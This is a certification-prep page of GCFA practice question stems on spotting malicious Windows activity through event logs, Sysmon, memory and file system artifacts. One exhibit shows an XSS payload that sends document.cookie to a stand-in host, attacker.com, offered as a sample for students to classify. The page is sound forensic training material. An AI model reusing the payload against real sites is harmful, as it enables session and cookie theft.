Courseiva

GCFA · topic practice

Identification of Malicious and Normal Activity practice questions

This domain tests your ability to distinguish malicious from benign activity using Windows artifacts: Security event logs, Sysmon, memory, and file system metadata. Questions present scenarios like credential dumping, logon anomalies, or botnet triage and ask which artifacts or event IDs confirm the activity. You must know event IDs, logon types, and tool outputs.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Editorial oversight:Johnson Ajibi· MSc IT Security, IEEE Senior Member
20 questionsDomain: Identification of Malicious and Normal Activity

What the exam tests

What to know about Identification of Malicious and Normal Activity

You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.

Windows Security event IDs: 4624, 4625, 4672, 4688, and logon types 3, 10

Sysmon event IDs for process creation, network connections, and image loads

Memory analysis artifacts for credential dumping: LSASS access, SAM, and cached credentials

Windows file system metadata: $MFT, $UsnJrnl, prefetch, and shimcache for execution evidence

Watch out for

Common Identification of Malicious and Normal Activity exam traps

  • ▸Assuming Event ID 4624 with Logon Type 3 always indicates malicious lateral movement, ignoring legitimate service or scheduled task logons.
  • ▸Confusing Event ID 4672 (special privileges assigned) as proof of compromise, when it also occurs for legitimate admin logons.
  • ▸Overlooking that Sysmon must be installed and configured; default Windows logs do not capture process creation or network connections.

Practice set

Identification of Malicious and Normal Activity questions

20 questions · select your answer, then reveal the explanation

Which TWO of the following indicators are highly suggestive of credential dumping activity in memory?

Refer to the exhibit. What type of attack is demonstrated in this server response?

Exhibit

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=a7b8c9d0e1f2g3h4i5j6
Content-Length: 450

<script>var x=new Image();x.src='http://attacker.com/collect?c='+document.cookie;</script>

Which artifact is most useful for detecting unauthorized persistence via a Windows registry Run key?

During a forensic analysis, you find a 'shimcache' (AppCompatCache) entry for an executable that no longer exists on the disk. What does this confirm?

A security analyst observes a workstation periodically initiating outbound HTTPS connections to an external IP address at exactly 03:00 UTC. The forensic artifact shows the process associated with these connections is 'svchost.exe' with a PID that changes daily. Which indicator strongly suggests malicious activity rather than a standard scheduled task?

An analyst discovers a suspicious file named 'svchost.exe' located in 'C:\Users\Public\'. Why is this highly suspicious from a forensic standpoint?

Which THREE of the following artifacts provide the most reliable evidence when determining if a specific user account was used to execute a malicious script?

An analyst finds an unusual entry in the Windows 'Run' registry key. What is the most effective next step to evaluate if this entry is malicious?

Which TWO of the following logs should an investigator review to identify potential lateral movement across an enterprise network?

During an investigation of a Windows 10 workstation, a forensic analyst runs a tool that parses the NTFS $MFT and observes a file record whose $STANDARD_INFORMATION timestamps are all earlier than the corresponding $FILE_NAME timestamps by roughly 45 minutes. The file resides in C:\Windows\System32 and is named 'lsass.exe'. What is the most accurate interpretation of this timestamp discrepancy?

A forensic analyst is examining a Windows Server 2016 domain controller after reports of unauthorized access. The analyst has collected the Security.evtx log, the NTDS.dit file, and the SYSVOL folder. Which TWO artifacts would most directly provide evidence that a DCSync attack was performed? (Choose two.)

A forensic analyst is investigating a suspected compromised Windows system. The analyst observes the following artifacts: (1) A scheduled task named 'Updater' that runs a PowerShell script from a remote URL every hour. (2) A registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run containing an entry for 'C:\Users\Public\update.exe'. (3) A new local user account named 'Support' with administrative privileges. (4) A service named 'RemoteSvc' with a binary path pointing to 'C:\Windows\Temp\svc.exe'. Which TWO of these artifacts are most indicative of persistence mechanisms? (Choose two.)

You are examining a Windows 10 endpoint suspected of hosting a persistence mechanism. You have collected the SYSTEM and SOFTWARE registry hives plus the user NTUSER.DAT. Which two registry locations should you inspect to identify auto-start entries that execute at user logon and do not require administrative privileges? (Choose two.)

A forensic analyst is examining a memory dump from a Windows 10 system. The analyst uses Volatility and runs the 'netscan' plugin, which shows an established connection from PID 4321 (explorer.exe) to a remote IP address 203.0.113.5 on port 443. The analyst knows that explorer.exe is not typically associated with network connections. What is the most likely explanation for this finding?

During an intrusion investigation on a Windows 10 workstation, you examine the USN Change Journal ($UsnJrnl:$J) and notice a cluster of DATA_OVERWRITE records for a file named 'invoice_2024.docx' in a user's Documents folder, followed immediately by a DATA_TRUNCATION record and then a series of DATA_EXTEND records with a filename that is no longer present on disk. Which activity does this sequence most likely represent?

During a forensic investigation of a Windows 10 workstation, an analyst examines the $MFT and discovers that the file record for a suspicious executable shows a Standard Information Attribute (SIA) creation timestamp that is later than its Filename Attribute (FNA) creation timestamp. The executable resides in C:\Windows\Temp. Which of the following best explains this discrepancy and its forensic significance?

An analyst is examining a Windows Server 2016 domain controller and finds that the Security event log contains event ID 4624 with Logon Type 3 and an Account Name that matches a domain user. The analyst suspects this logon was the result of a Pass-the-Hash attack. Which additional artifact, when correlated with this event, would most strongly support that conclusion?

An analyst is investigating a suspected data exfiltration incident on a Windows server. The analyst observes that a scheduled task named 'WindowsUpdateCheck' was created and configured to run a PowerShell script every hour. The script connects to an external IP address and uploads files from a sensitive directory. The analyst wants to determine when this scheduled task was created and what user account was used to create it. Which artifact should the analyst examine to find this information?

A forensic analyst is investigating a compromised Windows 10 host and suspects the attacker used Windows Management Instrumentation (WMI) for persistence and lateral movement. Which TWO of the following artifacts should the analyst examine to identify WMI-based persistence and execution? (Choose two.)

Question 20mediummultiple choice
Review the full subnetting walkthrough →

An analyst reviewing Windows event logs on a compromised workstation discovers a sudden spike in Event ID 4624 with Logon Type 3, followed immediately by Event ID 4672. The source IP address belongs to a non-routable internal subnet. Which forensic interpretation best explains this activity?

Free account

Track your progress over time

Create a free account to save your results and see which topics improve across sessions.

Focused Identification of Malicious and Normal Activity sessions

Start a Identification of Malicious and Normal Activity only practice session

Every question in these sessions is drawn from the Identification of Malicious and Normal Activity domain — nothing else.

Related practice questions

Related GCFA topic practice pages

Move into related areas when this topic feels solid.

Frequently asked questions

What does the GCFA exam test about Identification of Malicious and Normal Activity?
You must correlate Windows event logs, Sysmon, and memory artifacts to identify malicious activity like credential dumping or anomalous logons. The single most important thing is to verify the context of event IDs and logon types before concluding malice.
How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.
Can I practise just Identification of Malicious and Normal Activity questions in a focused session?
Yes — the session launcher on this page draws every question from the Identification of Malicious and Normal Activity domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.
Where can I practise other GCFA topics?
Use the topic links above to move to related areas, or go back to the GCFA question bank to see all topics.
Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the GCFA exam covers. They are not copied from any real exam or dump site.